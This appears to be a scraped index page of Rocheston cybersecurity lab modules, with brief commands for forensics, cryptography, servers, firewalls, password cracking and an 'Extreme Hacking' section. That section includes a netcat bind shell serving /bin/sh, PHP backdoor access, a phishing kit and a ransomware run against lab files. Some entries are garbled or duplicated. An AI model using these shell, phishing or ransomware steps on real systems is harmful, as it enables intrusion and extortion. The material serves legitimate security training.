Alt image
Stacks Image 2058


Labs: Introduction to RCT

Module 00
RCT Essentials
Introduction to RCT lab environment and tour of Rocheston Rose Web edition desktop.
Stacks Image 2428
Cyberlabs
Stacks Image 1085


Labs: Bash Scripting

Module 24
Bash Scripting
Bash scripting is a method of programming that utilizes the Bash shell in Linux systems. It involves writing a series of commands in a text file which can be executed in sequence to automate repetitive tasks, manage files and processes, and perform system administration tasks. Bash scripts are powerful tools capable of conditional statements, loops, functions and error handling.
Stacks Image 5575
Bash Scripting
Stacks Image 5580


Labs: Python Programming

Module 23
Python Programing
Python is a high-level, object-oriented programming language known for its easy syntactic style, making it a popular choice for beginners. It is versatile, efficient, and powerful, used for various applications including web development, data analysis, AI, machine learning, and scientific computing. Python supports multiple programming paradigms and has a large standard library, and it's also open-source with a vast community that contributes to its development and improvement.
Stacks Image 2430
Python Labs
Stacks Image 1205


Labs: fsarchiver

Module 22
Business Continuity and Disaster Recovery
FSArchiver is a system tool that allows you to save the contents of a file-system to a compressed archive file. The file-system can be restored on a partition which has a different size and it can be restored on a different file-system. Unlike tar/dar, FSArchiver also creates the file-system when it extracts the data to partitions.
Stacks Image 2432
FSArchiver Labs
Stacks Image 1227


Labs: Nikto Scanner

Module 21
Penetration Testing
The Nikto Scanning Tool is a highly advanced and efficient scanner used for identifying potential cyber threats or vulnerabilities in your system. It specializes in real-time detection of suspicious activity, effectively protecting your data from malicious attacks.

Scan remote websites for vulnerabilities.
Stacks Image 2434
Nikto Labs
Stacks Image 1256


Labs: Splint C++ Scanner

Module 21
Penetration Testing
Splint is a tool used for statically checking C++ codes for security vulnerabilities and programming mistakes. The tool, originally known as LCLint, allows programmers to conduct intermediate test compilations of code while writing in order to identify potential issues rapidly. It highlights errors in a variety of types, including possible null pointers, memory leaks, etc. This helps in preventing the software from developing significant faults or vulnerabilities.
Stacks Image 2436
Splint C++ Scanner
Stacks Image 1290


Labs: Identify filesystem of an image

Module 20
Incident Response
Let’s scan the zelda.img for the boot sector to identify the partition.

file zelda.img
blkid -o value -s TYPE zelda.img

This command will analyze the image file or partition and display the detected file system type.
Stacks Image 2438
Forensics
Stacks Image 1314


Labs: Create and Mount dd image

Module 20
Incident Response
dd if=/dev/zero of=rocheston.img bs=1M count=10

This command creates a file named rocheston.img with a size of 10MB. The bs flag indicates the block size, and the count flag indicates the number of blocks.

Next, create a file system (e.g., FAT32) on the rocheston image:
mkfs.vfat rocheston.img
Stacks Image 2440
Forensics
Stacks Image 1338


Labs: Recover data using ddrescue

Module 20
Incident Response
Start the recovery process using ddrescue:

mkdir /zelda_recovered

ddrescue -n -r3 zelda.img /zelda_recovered/recovered_zelda.img /zelda_recovered/recovered_zelda/recovery.log
Stacks Image 2442
Forensics
Stacks Image 6005


Labs: Secure Delete

Module 20
Incident Response
Secure file, disk, swap, memory erasure utilities.

echo ‘Secret: 45477545’ > secret.txt

sdel -v secret.txt

This file has been securely erased and cannot be retrieved using forensic recovery methods.
Stacks Image 2444
Forensics
Stacks Image 1386


Labs: extundelete

Module 20
Incident Response
Recover deleted files from an ext3 or ext4 partition.

exrundelete -h

You will need to mount a partition for this tool to work.
Stacks Image 2446
Forensics
Stacks Image 1410


Labs: Lziprecover

Module 20
Incident Response
Lziprecover is a data recovery tool and decompressor for files in the lzip compressed data format (.lz). Lziprecover is able to repair slightly damaged files (up to one single-byte error per member), produce a correct file by merging the good parts of two or more damaged copies, reproduce a missing (zeroed) sector using a reference file, extract data from damaged files, decompress files, and test integrity of files.

lziprecover -h
Stacks Image 2448
Forensics
Stacks Image 1451


Labs: sleuthkit blkcat

Module 20
Incident Response
blkcat displays the contents of a specified block address in a disk image. It's useful for quickly examining particular data blocks on a disk.

blkcat -o 0 -b 4096 zelda.img 10 -f fat32 -a
Stacks Image 2450
Forensics
Stacks Image 1492


Labs: sleuthkit blkcalc

Module 20
Incident Response
blkcalc is a simple utility that translates between unallocated block addresses, disk sector addresses, and partition-relative block addresses.

blkcalc -u -o fs-offset -b 1024 disk-image
Stacks Image 2452
Forensics
Stacks Image 1516


Labs: sleuthkit blkls

Module 20
Incident Response
blkls lists the allocated and/or unallocated blocks of a disk or file system. This can help identify suspicious large unallocated blocks on a disk.

blkls -o fs-0 -b 512 zelda.img -f fat32
Stacks Image 2454
Forensics
Stacks Image 1538


Labs: sleuthkit fls

Module 20
Incident Response
fls displays the file and directory names in a disk image. The example below lists all files and directories in zelda.img:

Find the anode number of a file in an image.

fls zelda.img -f fat32
Stacks Image 2456
Forensics
Stacks Image 1560


Labs: sleuthkit fcat

Module 20
Incident Response
fcat allows you to view the contents of a file in a disk image. Assuming that there is a file named “jason.txt" that you want to check the content of:


icat -f fat32 -i-o 0 -r zelda.img 21856

21856 is the inode of file hey.txt
Stacks Image 2458
Forensics
Stacks Image 1582


Labs: sleuthkit fsstat

Module 20
Incident Response
fsstat will display the filesystem details.


fsstat -f fat 32 zelda.img |more
Stacks Image 2460
Forensics
Stacks Image 1605


Labs: sleuthkit ffind

Module 20
Incident Response
ffind helps you search for files and directories within the disk image based on metadata. For example, if you want to find all deleted files in the image:


ffind -o 0 -f fat32 -d zelda.img 5

5 is the anode number
Stacks Image 2462
Forensics
Stacks Image 1626


Labs: sleuthkit extract deleted file

Module 20
Incident Response
To extract an orphaned file from the zelda.img, you can use the icat command. Since you have found the inode number of the orphaned PNG file, you can now extract the file using the following command:

icat -f fat32 -r zelda.img 5 > extracted_file.png
Stacks Image 2464
Forensics
Stacks Image 1650


Labs: sleuthkit fiwalk

Module 20
Incident Response
fiwalk generates an XML or DFXML representation of the file metadata from an image file. To create an XML file with metadata information of zelda.img:


fiwalk -f fat32 -X zelda.xml zelda.img
Stacks Image 2466
Forensics
Stacks Image 1671


Labs: sleuthkit ifind

Module 20
Incident Response
ifind helps you locate metadata structures (inodes) of files in the disk image. To find the inode of a specific file called "file.txt":

ifind -f fat32 zelda.img -n /hello.txt
Stacks Image 2468
Forensics
Stacks Image 1692


Labs: sleuthkit ils

Module 20
Incident Response
This tool is used to list metadata entries and their properties.

ils -f fat32 zelda.img

This command will list the metadata entries for the zelda.img file.
Stacks Image 2470
Forensics
Stacks Image 1716


Labs: sleuthkit img_cat

Module 20
Incident Response
This tool outputs the contents of an image file.

Example: img_cat zelda.img

This command will output the contents of the zelda.img file with the FAT32 filesystem.
Stacks Image 2472
Forensics
Stacks Image 1737


Labs: sleuthkit istat

Module 20
Incident Response
This tool displays the file metadata.

istat -f fat32 zelda.img 5

This command will display the metadata for inode number 5 in the zelda.img file.

5 is the inode of a file.
Stacks Image 2474
Forensics
Stacks Image 1758


Labs: sleuthkit srch_strings

Module 20
Incident Response
This tool searches for strings in a file or device.

srch_strings zelda.img | grep ‘hello’
Stacks Image 2476
Forensics
Stacks Image 1783


Labs: sleuthkit tsk_imageinfo

Module 20
Incident Response
This command will display information about the zelda.img file.

tsk_imageinfo zelda.img
Stacks Image 2478
Forensics
Stacks Image 1804


Labs: sleuthkit tsk_loaddb

Module 20
Incident Response
This tool loads file system metadata into a SQLite database.

tsk_loaddb zelda zelda.img

This command will load file system metadata from the zelda.img file into a SQLite database named "zelda.db."
Stacks Image 2526
Forensics
Stacks Image 1825


Labs: sleuthkit tsk_recover

Module 20
Incident Response
mkdir zelda_output

tsk_recover -f fat32 zelda.img zelda_output
ls -l zelda_ouput
Stacks Image 2482
Forensics
Stacks Image 1846


Labs: sleuthkit usnjls

Module 20
Incident Response
usnjls zelda.img

This command will display the USN journal entries present in the zelda.img file.

Works on ntfs filesystems.
Stacks Image 2484
Forensics
Stacks Image 1869


Labs: GHex

Module 20
Incident Response
Launch Ghex under development.
Open Tips.txt located under Documents directory.
Stacks Image 2486
Forensics
Stacks Image 1890


Labs: Examine vulnerable source code

Module 19
DevSecOps
The scripts directory contains tons of vulnerable code in different programming languages.
Examine these files.

cd /scripts
ls -l
Stacks Image 2488
DevSecOps
Stacks Image 1949


Labs: SAST scan using flawfinder

Module 19
DevSecOps
Flawfinder is a simple program that scans C/C++ source code and reports potential security flaws. It can be a useful tool for examining software for vulnerabilities, and it can also serve as a simple introduction to static source code analysis tools more generally.

python flawfinder.py /scripts | more
Stacks Image 2490
DevSecOps
Stacks Image 1973


Labs: Crack IVS Key using aircrack-ng

Module 18
Wireless Technologies
Aircrack-ng is a comprehensive suite of tools designed to assess WiFi network security. Its capabilities include monitoring, attacking, testing, and cracking security protocols within networks. It operates by capturing data packets in the wireless network environment and then exporting the data to text files for further processing.
Stacks Image 2492
DevSecOps
Stacks Image 1997


Labs: Wifi pcap using tcpdump

Module 18
Wireless Technologies
View the Wifi 5GHZ captured traffic using tcpdump.

tcpdump -r wpa3-5ghz.pcap | more
Stacks Image 2494
DevSecOps
Stacks Image 2021


Labs: aircrack-ng brute force attack

Module 18
Wireless Technologies
aircrack wpa3-24ghz.pcap -w wordlist2.txt
Stacks Image 2496
DevSecOps
Stacks Image 2045


Labs: Start LDAP Server

Module 17
LDAP, SNMP, POP3, IMAP
/etc/init.d/openldap start

Run nmap to check the 389 port is open
nmap 127.0.0.1
Stacks Image 2498
DevSecOps
Stacks Image 2088


Labs: Configure Openldap

Module 17
LDAP, SNMP, POP3, IMAP
Openldap configuration files are locked here. Any changes you may here, you will need to restart the openldap services.

/etc/openldap
Stacks Image 2500
DevSecOps
Stacks Image 2134


Labs: Search Openldap

Module 17
LDAP, SNMP, POP3, IMAP
This command should list all the records from openldap.

ldapsearch -x -b "dc=rocheston,dc=com" -D "cn=admin,dc=rocheston,dc=com" -w rocheston |more
Stacks Image 2502
DevSecOps
Stacks Image 2158


Labs: Search Openldap

Module 17
LDAP, SNMP, POP3, IMAP
This command should list all the records from openldap.

ldapsearch -x -b "dc=rocheston,dc=com" -D "cn=admin,dc=rocheston,dc=com" -w rocheston |more
Stacks Image 2504
CyberLabs
Stacks Image 2112


Labs: Add a entry Openldap

Module 17
LDAP, SNMP, POP3, IMAP
Modify the user.ldif file using nano editor.

Change name and other details and save the file.
Stacks Image 2506
CyberLabs
Stacks Image 2184


Labs: Start Postfix SMPT server

Module 17
LDAP, SNMP, POP3, IMAP
/etc/init.d/postfix start

Run nmap to check the 25 port is open
nmap 127.0.0.1
Stacks Image 2508
CyberLabs
Stacks Image 2225


Labs: Configure Postfix SMPT server

Module 17
LDAP, SNMP, POP3, IMAP
The configuration files for Postfix are located here.

/etc/postfix
Stacks Image 2510
CyberLabs
Stacks Image 2249


Labs: Start Dovecot Pop3, IMAP server

Module 17
LDAP, SNMP, POP3, IMAP
/etc/init.d/dovecot start
Run nmap to check the 110/995/143 port is open

nmap 127.0.0.1
Stacks Image 2512
CyberLabs
Stacks Image 2273


Labs: Send a mail

Module 17
LDAP, SNMP, POP3, IMAP
echo "Hello Jason! How are you?" | mail -s "Sub: Jason" root@localhost
Stacks Image 2514
CyberLabs
Stacks Image 2297


Labs: Use mutt email client

Module 17
LDAP, SNMP, POP3, IMAP
Launch mutt e-mail client. Mutt runs in terminal. It is command line based e-mail client.

mutt -f /root/Maildir/

This command connect mutt to your mailbox.
Stacks Image 2516
CyberLabs
Stacks Image 2321


Labs: Start SNMP server

Module 17
LDAP, SNMP, POP3, IMAP
snmpd
Check if the service is running

ps aux | grep snmpd
Stacks Image 2518
CyberLabs
Stacks Image 2345


Labs: SNMPWALK

Module 17
LDAP, SNMP, POP3, IMAP
Retrive server details using snmpwalk. This command connects to the snmpd server to read the MiBs.

snmpwalk -v 2c -c public localhost |more
Stacks Image 2520
CyberLabs
Stacks Image 2369


Labs: PHPLdapAdmin

Module 17
LDAP, SNMP, POP3, IMAP
Launch Midori browser
logon as
cn=admin,dc=rocheston,dc=com
Password: rocheston
Stacks Image 2522
CyberLabs
Stacks Image 2393


Labs: Claws Email

Module 17
LDAP, SNMP, POP3, IMAP
Configure Claws email client to fetch the mails from openldap server.
Stacks Image 2524
CyberLabs
Stacks Image 2417


Labs: Start Mysql Server

Module 16
Managing Databases
/etc/init.d/mysql start
Run nmap to check the 3306 port is open

nmap 127.0.0.1
Stacks Image 2557
CyberLabs
Stacks Image 2562


Labs: Connect to Mysql Server

Module 16
Managing Databases
mysql -u root -p

There is no password. You should be logged on to mysql server.
Stacks Image 2583
CyberLabs
Stacks Image 2588


Labs: List databases and tables

Module 16
Managing Databases
show databases;

This command should list the databases in the system.
Stacks Image 2609
CyberLabs
Stacks Image 2614


Labs: Create databases and tables

Module 16
Managing Databases
1. First, create the `magician` database:
CREATE DATABASE magician;

2. Connect to the `magician` database:
USE magician;

3. Create the `magic` table with the fields `illusion` and `effect`:
CREATE TABLE magic (
id INT AUTO_INCREMENT PRIMARY KEY,
illusion VARCHAR(255) NOT NULL,
effect VARCHAR(255)
);
Stacks Image 2635
CyberLabs
Stacks Image 2640


Labs: SQL Statements SELECT statements

Module 16
Managing Databases
Select all columns from the actor table.
SELECT * from actor;

Select only the last_name column from the actor table.
SELECT last_name from actor;
Stacks Image 2661
CyberLabs
Stacks Image 2666


Labs: Mongo database

Module 16
Managing Databases
VM1
In the VM1, type ifconfig and note down the ip address. ping 1.1.1.1 to test the network.
Start mongod daemon.
mongod

VM2
Connect to the remote MongoD
mongo

Create a new collection.
db.createCollection(“sampleCollection")
Stacks Image 2687
CyberLabs
Stacks Image 2692


Labs: Postgre database

Module 16
Managing Databases
Launch postgres interactive shell using psql.

su - postgres
psql
Stacks Image 2713
CyberLabs
Stacks Image 2718


Labs: Start Redis Server

Module 16
Managing Databases
Run Redis Server in the foreground
redis-server

Press Control + C

Now, run the redid-server in the background.

redis-server &
Stacks Image 2739
CyberLabs
Stacks Image 2744


Labs: Generate a self-signed SSL certificate

Module 15
Managing Web Servers
openssl req -x509 -newkey rsa:1024 -nodes -keyout rocheston.key -out rocheston.crt -days 365 \
-subj “/C=US/ST=NY/L=NYC/O=Rocheston/OU=Cyberlabs/CN=rocheston/[email protected]"

You should see 2 files generates.
1. rocheston.key (This is the private key)
2. rocheston.crt (This is the SSL certificate)
Stacks Image 2765
CyberLabs
Stacks Image 2770


Labs: Apache2 Config

Module 15
Managing Web Servers
Use su / rocheston (for root access)
Apache2 config files are located at
/etc/apache/httpd.conf
Stacks Image 2791
CyberLabs
Stacks Image 2796


Labs: Apache2 Virtualhost

Module 15
Managing Web Servers
View the rocheston.conf file. This file lists the configuration for default website listening on port 80 and 443.

more /etc/apache/conf.d/rocheston.conf
Stacks Image 2817
CyberLabs
Stacks Image 2822


Labs: Apachectl commands

Module 15
Managing Web Servers
You can stop and start Apache using apachectl command.

apachectl -t
apachectl stop
apachectl start
Stacks Image 2843
CyberLabs
Stacks Image 2848


Labs: Visit localhost

Module 15
Managing Web Servers
Launch midori and visit localhost.
http://localhost
The web page should load from /var/www/web1
Stacks Image 2869
CyberLabs
Stacks Image 2874


Labs: Set file permissions

Module 15
Managing Web Servers
Set permission to /var/www/web1 directory.
chmod -R 775 /var/www/web1
Stacks Image 2895
CyberLabs
Stacks Image 2900


Labs: Nginx configuration

Module 15
Managing Web Servers
Open terminal. Logon as su / rocheston)
geany /etc/nginx/nginx.conf

View the virtual host settings for port 80 and 443.
Stacks Image 2921
CyberLabs
Stacks Image 2926


Labs: Nginx Visit localhost

Module 15
Managing Web Servers
Launch midori and visit localhost.
Try https
https://localhost
The web page should load from /var/www/web2
using SSL encryption.
Stacks Image 2947
CyberLabs
Stacks Image 2952


Labs: Webalizer

Module 15
Managing Web Servers
Generate web statistics using webalizer.

cd ~/Downloads
webalizer /var/log/apache/access.log

You should see html files generated.
Stacks Image 2973
CyberLabs
Stacks Image 2978


Labs: GPG encryption

Module 14
Cryptography
Generate key from config file.
cat rocheston.config
gpg —batch —generate-key rocheston.config

List the keys
gpg —list-keys
Stacks Image 2999
CyberLabs
Stacks Image 3004


Labs: GPG Digital signature

Module 14
Cryptography
rm secret.txt.gpg
gpg --sign --default-key [email protected] secret.txt
Step 3: Verify the signature
gpg --verify secret.txt.gpg

You can send the file to the recipient, who can then verify the file and extract the file with the command:
gpg --output secret-new.txt --decrypt secret.txt.gpg
Stacks Image 3025
CyberLabs
Stacks Image 3030


Labs: Openssl

Module 14
Cryptography
Generate RSA public / private key pair.
Generate Private Key
openssl genrsa -out rocheston-private.pem 1024

Generate Public Key
openssl rsa -pubout -in rocheston-private.pem -out rocheston-public.pem
Stacks Image 3051
CyberLabs
Stacks Image 3056


Labs: Openssl Encrypt a file

Module 14
Cryptography
You have a public key for someone, you have a file you want to send them, you want to send it securely.
Step 1: Get their public key (.pem format)
Step 2: Generate a 256 bit random key
openssl rand -base64 32 > key.bin
Step 3: Encrypt the key openssl rsautl -encrypt -inkey rocheston-public.pem -pubin -in key.bin -out key.bin.enc
Stacks Image 3077
CyberLabs
Stacks Image 3082


Labs: Generate large prime numbers

Module 14
Cryptography
openssl prime -generate -bits 1024

This command generates unique 1024 bit random prime number.
Stacks Image 3103
CyberLabs
Stacks Image 3108


Labs: Generate Certificate Signing Request (CSR)

Module 14
Cryptography
[ req ]
default_bits = 1024
default_md = sha128
prompt = no
utf8 = yes
distinguished_name = rocheston_dn

[ my_distinguished_name ]
commonName = Cyberlabs
organizationName = Rocheston
organizationalUnitName = Training Department
emailAddress = [email protected]
localityName = New York City
stateOrProvinceName = NY
countryName = US
Stacks Image 3129
CyberLabs
Stacks Image 3134


Labs: Generate a self-signed SSL certificate

Module 14
Cryptography
openssl req -x509 -newkey rsa:1024 -nodes -keyout private2.key -out rocheston.crt.pem -days 365 \
-subj “/C=US/ST=NY/L=Chicago/O=Rocheston/OU=Cyberlabs/CN=rocheston.com/[email protected]"

You should see 2 files generates.
1. private2.key (This is the private key)
2. rocheston.crt.pem (This is the SSL certificate)
Stacks Image 3155
CyberLabs
Stacks Image 3160


Labs: Check SSL/TLS handshake of a remote server

Module 14
Cryptography
openssl s_client -connect apple.com:443
Stacks Image 3181
CyberLabs
Stacks Image 3186


Labs: Generate a Diffie-Hellman (DH) parameter

Module 14
Cryptography
openssl dhparam -out dhparam.pem 1024

The Diffie–Hellman (DH) Algorithm is a key-exchange protocol that enables two parties communicating over public channel to establish a mutual secret without it being transmitted over the Internet. DH enables the two to use a public key to encrypt and decrypt their conversation or data using symmetric cryptography.
Stacks Image 3207
CyberLabs
Stacks Image 3212


Labs: md5sum: Computes and checks MD5 (128-bit) hash values

Module 14
Cryptography
md5sum secret.txt
sha1sum secret.txt

echo -n “Hello World!” | md5sum
echo -n “Hello World!” | sha1sum
echo -n “Hello World!” | sha256sum
Stacks Image 3233
CyberLabs
Stacks Image 3238


Labs: Generate hash using openssl

Module 14
Cryptography
openssl dgst -sha256 secret.txt
openssl dgst -sha512 secret.txt

echo -n “Hello World!” | openssl dgst -sha1
Stacks Image 3259
CyberLabs
Stacks Image 3264


Labs: Encrypt files using aescrypt

Module 14
Cryptography
Encrypt a file using AESCrypt
aescrypt -e -p "magic-password" secret.txt
The encrypted file will be named "secret.txt.aes".

Decrypt a file using AESCrypt
aescrypt -d -p "magic-password" secret.txt.aes
Stacks Image 3285
CyberLabs
Stacks Image 3290


Labs: Encrypt files using mcrypt

Module 14
Cryptography
mcrypt secret.txt
Enter passphrase: [enter the passphrase]

This command will encrypt the file 'secret.txt' using the default algorithm and produce an encrypted file named 'secret.txt.nc'.

Decrypt an encrypted file:
mcrypt -d secret.txt.nc
Enter passphrase: [enter the passphrase]
Stacks Image 3311
CyberLabs
Stacks Image 3316


Labs: Configure iptables

Module 13
Firewall and IDS
Type ifconfig and note down the IP address.
nmap 127.0.0.1
See the current ports open
Let’ start sshd daemon
mkdir /var/run/sshd
/etc/init.d/sshd start
nmap 127.0.0.1
Test if Internet works
ping 1.1.1.1
Stacks Image 3337
CyberLabs
Stacks Image 3342


Labs: Apache mod-security

Module 13
Firewall and IDS
Goto
/etc/apache/modsecurity
View the OWASP WAF rules in rules directory.
View the mod security.conf files
apachectl -M
(Check if the mod security is enabled)
The web server is enabled for WAF protection.
ping 1.1.1.1
Stacks Image 3387
CyberLabs
Stacks Image 3392


Labs: Configure ufw

Module 13
Firewall and IDS
ufw deny ssh
This command blocks SSH
ufw allow ssh
This command allows ssh
(Experiment with other ufw options)
Stacks Image 3413
CyberLabs
Stacks Image 3418


Labs: Configure firehol

Module 13
Firewall and IDS
ufw deny ssh
This command blocks SSH
ufw allow ssh
This command allows ssh
(Experiment with other ufw options)
Stacks Image 3439
CyberLabs
Stacks Image 3444


Labs: Snort IDS

Module 13
Firewall and IDS
Goto Snort VM
Enable Internet access.
ifconfig eth1 up
udhcpc -i eth1
ping 1.1.1.1
Launch Snort IDS
snort -dev
On Cyberlabs VM, ping the Snort VM ip
Stacks Image 3465
CyberLabs
Stacks Image 3470


Labs: Firewall Builder

Module 13
Firewall and IDS
Launch Firewall Builder from terminal
sudo fwbuilder

Create new firewall and add rules.

On Cyberlabs VM, ping the Snort VM ip
Stacks Image 3491
CyberLabs
Stacks Image 3496


Labs: Wordlist

Module 12
Password Management
View popular default passwords in these directories.
cd /wordlist
more passlist.txt
more rdp_passlist.txt
type q to quit
Stacks Image 3517
CyberLabs
Stacks Image 3522


Labs: hydra

Module 12
Password Management
Start ssh service.
mkdir /var/run/sshd
/etc/init.d/sshd start
nmap 127.0.0.1
You should see port 22 open.

Let’s crack ssh login using hydra.
hydra -l rocheston -p rocheston 127.0.0.1 ssh
Stacks Image 3543
CyberLabs
Stacks Image 3548


Labs: John the Ripper

Module 12
Password Management
cd /
mkpasswd dragon > hash.txt
cat hash.txt
john —wordlist=wordlist.txt hash.txt

Type john for more options
Stacks Image 3569
CyberLabs
Stacks Image 3574


Labs: hashcat

Module 12
Password Management
hashcat -h
(see various options)
Stacks Image 3595
CyberLabs
Stacks Image 3600


Labs: pwgen

Module 12
Password Management
Generate random passwords.
pwgen
Stacks Image 3621
CyberLabs
Stacks Image 3626


Labs: ophcrack

Module 12
Password Management
Open Terminal
ophcrack
Load PWDUMP file pwdump.txt
Stacks Image 3647
CyberLabs
Stacks Image 3652


Labs: tshark sniffer

Module 11
Network Sniffing
In Ettercap VM enable Internet access.
ifconfig eth2 up
udhcpc -i eth2
Note down the IP address with ifconfig
tshark
Stacks Image 3673
CyberLabs
Stacks Image 3678


Labs: tcpdump sniffer

Module 11
Network Sniffing
Launch tcpdump in Ettercap VM.
tcpdump

Goto Cyberlabs VM. Ping the IP of Ettercap VM.
ping [ettercap vm ip]

View the sniffed packets on the ettercap console.
Stacks Image 3699
CyberLabs
Stacks Image 3704


Labs: MiTM Attack

Module 11
Network Sniffing
Launch ARP spoofing on VM2 and redirect all traffic to VM3

The goal is to capture FTP password when vm1 user logs on to vm2.
Stacks Image 3725
CyberLabs
Stacks Image 3730


Labs: Wireshark

Module 11
Network Sniffing
Goto Capture —> Interfaces.
Select eth2
Click Start
Stacks Image 3751
CyberLabs
Stacks Image 3756


Labs: Etherape

Module 11
Network Sniffing
Launch Midori and browse the web.
See the captured traffic in Etherape.
Stacks Image 3777
CyberLabs
Stacks Image 3782


Labs: Zaco PHP Backdoor

Module 10
Extreme Hacking
Launch Midori web browser. Connect to PHP Backdoor VM using the IP address.
(If you get router timeout error then ping 1.1.1.1 on the remote vm to keep the connection alive)
http://[IP Address of PHP]/zaco.php
Stacks Image 3803
CyberLabs
Stacks Image 3808


Labs: Netcat

Module 10
Extreme Hacking
Window 1 (Server)
Run ifconfig and not the IP address.
nc -l -p 4444 -r /bin/sh

Window 2 (Client)
nc [server ip address] 4444
(You will not see the prompt)
Type remote commands here.
Stacks Image 3829
CyberLabs
Stacks Image 3834


Labs:Shell.php backdoor

Module 10
Extreme Hacking
In RATX machine, type ifconfig and note down the IP address.
The shell.php is located at /var/www
The password is bug
Go to RATX 2nd window and type
goto /PHP-BACKDOORS
python heavenly -u http://[ratx ip]/shell.php bug
You are now connected to the remote machine.
Stacks Image 3855
CyberLabs
Stacks Image 3860


Labs:Phishing toolkit

Module 10
Extreme Hacking
Launch Terminal
cd phishing/shellphish
./shellphish
Select 06 (Google)
Wait for the link to be generated
Stacks Image 3881
CyberLabs
Stacks Image 3886


Labs:Ransomware Attacks

Module 10
Extreme Hacking
Navigate to
cd /ransomware
The test directory contains some files. We will encrypt the test directory with ransomware.
./ransomware encrypt test
The files should be encrypted in test directory.
Stacks Image 3907
CyberLabs
Stacks Image 3912


Labs:Snow Steganography

Module 10
Extreme Hacking
Hides files using steganography tool: snow.
Open Terminal
echo ‘Hello World!’ > hello.txt
stegsnow -m ‘My swiss bank account number is: 33345345345-345’ hello.txt hello2.txt
cat hello2.txt
stegsnow hello2.txt
Stacks Image 3933
CyberLabs
Stacks Image 3938


Labs:Outguess

Module 10
Extreme Hacking
Outguess hides information in images
Open Terminal. Go to ~/Images directory.
echo ‘This is secret:45334’ > secret.txt
outguess -d secret.txt street.jpg street2.jpg
View the street2.jpg (It should look normal.)
Stacks Image 3959
CyberLabs
Stacks Image 3964


Labs:Stegoo

Module 10
Extreme Hacking
Practice steganography using Rocheston Stegoo.
Visit
https://www.rosebird.org/stegoo
Stacks Image 3985
CyberLabs
Stacks Image 3990


Labs:Tor Browser

Module 10
Extreme Hacking
Visit Dark Web websites using Tor.
Download and and install Tor browser.
https://www.torproject.org
Stacks Image 4011
CyberLabs
Stacks Image 4016


Labs:Publish a Website Using TOR

Module 10
Extreme Hacking
Open Terminal and logon as su with rocheston as the password.
cd /var/lib/tor/hidden_service
cat hostname
This is your onion address. If you delete this file and restart tor, new onion address will be generated.
txzprk7jjpzwylqwerdiq4xnb6zjcv72asjawo2mjefpdldtgzge7nyd.onion
Stacks Image 4037
CyberLabs
Stacks Image 4042


Labs:SQL Injection Attack

Module 09
Web Application Security
Let’s launch SQL injection attack on the mysql server which runs web application.

Launch Midori
Type the http://[ip of mysql server]/sql
Stacks Image 4063
CyberLabs
Stacks Image 4068


Labs: Sqlmap

Module 09
Web Application Security
Stacks Image 4089
CyberLabs
Stacks Image 4094


Labs: DVWA

Module 09
Web Application Security
Launch Midori Web browser. Goto
http://localhost/dvwa
Stacks Image 4115
CyberLabs
Stacks Image 4120


Labs: Wordpress

Module 09
Web Application Security
Launch Midori. Goto
http://localhost/wordpress

Admin page:
http://localhost/wordpress/wp-login.php
Username: rocheston
Password: rocheston
Stacks Image 4141
CyberLabs
Stacks Image 4146


Labs: CyberChef

Module 09
Web Application Security
CyberChef is a simple, intuitive web app for carrying out all manner of "cyber" operations within a web browser. These operations include simple encoding like XOR and Base64, more complex encryption like AES, DES and Blowfish, creating binary and hexdumps, compression and decompression of data, calculating hashes and checksums, IPv6 and X.509 parsing, changing character encodings, and much more.

Visit:
https://gchq.github.io/CyberChef/
Stacks Image 4167
CyberLabs
Stacks Image 4172


Labs: Threat Modeling

Module 08
Risk Assessments
Visit https://app.diagrams.net/
It is free to use. Create threats, attacks, mitigations and responses using the GUI design elements.
Stacks Image 4193
CyberLabs
Stacks Image 4198


Labs: CVE Search

Module 07
Vulnerability Assessment
Goto
https://cve.mitre.org/cve/search_cve_list.html

Search Apple TV
This will list apple tv vulnerabilities.
Stacks Image 4219
CyberLabs
Stacks Image 4224


Labs: chkrootkit

Module 07
Vulnerability Assessment
Run chkrootkit tool to search malware and exploits on the Linux machine.

cd /usr/share/chkrootkit
./chkexploit |more
Stacks Image 4245
CyberLabs
Stacks Image 4250


Labs: Lynis

Module 07
Vulnerability Assessment
Audit the Linux system for vulnerabilities using Lynis tool.

lynis audit system
Stacks Image 4271
CyberLabs
Stacks Image 4276


Labs: Splint

Module 07
Vulnerability Assessment
Splint is a static code analysis tool used for detecting security vulnerabilities and programming errors in C source code.

cd /scripts/Buffer Overflow
splint *.c
Stacks Image 4297
CyberLabs
Stacks Image 4302


Labs: ClamAV

Module 07
Vulnerability Assessment
ClamAV is an open-source antivirus software application used to detect Trojans, viruses, malware, and other malicious threats on Unix-based systems, like Linux and macOS. It serves as a security tool for email gateways, web servers, and other systems connected to the internet. ClamAV includes a scanning engine, command-line utilities, and a regularly updated database of virus signatures, which helps it identify and remove malware effectively.

clamscan /
Stacks Image 4323
CyberLabs
Stacks Image 4328


Labs: Openvas

Module 07
Vulnerability Assessment
Launch vulnerability scanner using Openvas scanner.

sudo openvassd
OpenVas-Client

Login: admin / password
Stacks Image 4349
CyberLabs
Stacks Image 4354


Labs: Email Header Analyzer Tool

Module 06
Information Gathering
Email Header Analyzer Tool by MXToolBox: Students can learn to analyze email headers and extract valuable information using this tool.
https://mxtoolbox.com
Stacks Image 4375
CyberLabs
Stacks Image 4380


Labs: shodan.io

Module 06
Information Gathering
Search for Internet connected devices using Shodan.
https://shodan.io
Stacks Image 4401
CyberLabs
Stacks Image 4406


Labs: urlscan.io

Module 06
Information Gathering
Search a website using urlscan.io
https://urlscan.io
Stacks Image 4427
CyberLabs
Stacks Image 4432


Labs: Netcraft

Module 06
Information Gathering
Detect site details using Netcraft
https://www.netcraft.com

Query www.juggyshop.com
Stacks Image 4453
CyberLabs
Stacks Image 4458


Labs: archive.org

Module 06
Information Gathering
View past website using Archive repository.
https://archive.org

Search for juggyboy.com
Stacks Image 4479
CyberLabs
Stacks Image 4484


Labs: OSINT Framework

Module 06
Information Gathering
Visit OSINT framework online.
https://osintframework.com/
Stacks Image 4505
CyberLabs
Stacks Image 4510


Labs: Mirror a Website Using httrack

Module 06
Information Gathering
Launch httrack fill in the details
URL: https://www.juggybank.com
Stacks Image 4531
CyberLabs
Stacks Image 4536


Labs: Nmap

Module 06
Information Gathering
nmap -h

View various options.
Stacks Image 4557
CyberLabs
Stacks Image 4562


Labs: HTTPing

Module 05
Advanced Networking
httping —help

httping haja.me
Stacks Image 4583
CyberLabs
Stacks Image 4588


Labs: arping

Module 05
Advanced Networking
arping —help

Launch Cyberlabs VM. Get the ipaddress of this vm.
arping 10.5.47.142
arping the cyberlabs vm
Stacks Image 4609
CyberLabs
